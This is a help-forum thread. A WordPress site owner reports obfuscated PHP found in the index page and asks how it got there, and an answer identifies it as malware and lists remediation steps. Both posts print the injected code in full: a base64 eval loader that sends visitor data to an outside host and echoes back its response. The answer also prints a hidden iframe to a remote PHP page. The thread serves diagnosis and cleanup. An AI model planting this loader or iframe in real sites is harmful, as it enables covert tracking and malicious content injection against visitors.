Home/ Questions/Q 6756081
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-05-26T13:28:50+00:00

I have a wordpress website, recently I saw too much slow loading index page.

  • 0

I have a wordpress website, recently I saw too much slow loading index page. For two weeks I have been trying to find the problem but found nothing. Last day I backup all files and deleted everything from my website and when I opened my website index page in notepad++.

I saw too much strange codes and when I run my site on locally on wamp my antivirus issues too many warnings and blocks a lot of external going connections.
I saw this code on my website index page:

<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

tell me why is this code in my page and how it got there, I found this on no other pages also tell me what should I do now and my eset antivirus says this when I load my page in wamp:

Details:

Web page:
http://91.196.216.30/bt.php?ip=127.0.0.1&host=localhost&uri=/web/wordpress/&ua=mozilla/5.0+(windows+nt+6.1)+applewebkit/535.1+(khtml,+like+gecko)+chrome/14.0.835.187+safari/535.1&ref=

Description:
Access to the web page was blocked by ESET NOD32 Antivirus.
The web page is on the list of websites with potentially dangerous content.

www.eset.com
Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    Its a malware. You should do the following (very fast):

    • Delete all your FTP accounts, make new ones with different names and passwords
    • Change all possible passwords related to your server
    • Download all your server files and use some editor to search local directory for eval(base64_decode( and iframe. Remove them!
    • Contact your ISP, they should run a test on your server to confirm everything is clean
    • Clean your computer and setup better antivirus protection, because that’s where it started
    • Check “bad sites” lists for your domain and after you cleaned everything, send them request to reevaluate your domain

    Lines you want to look in your case are:

    <iframe src='http://195.2.252.137/ftp.php' width='1' height='1' style='visibility: hidden;'></iframe>

    and

    <?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTI ​zNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1I ​pOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

    Usually the eval part is being added after ?> and usually in index files, but maybe anywhere. Its being used for pagerank scams.

    If you wish to learn more about it, then check here: http://en.wikipedia.org/wiki/Iframe_virus

    • 0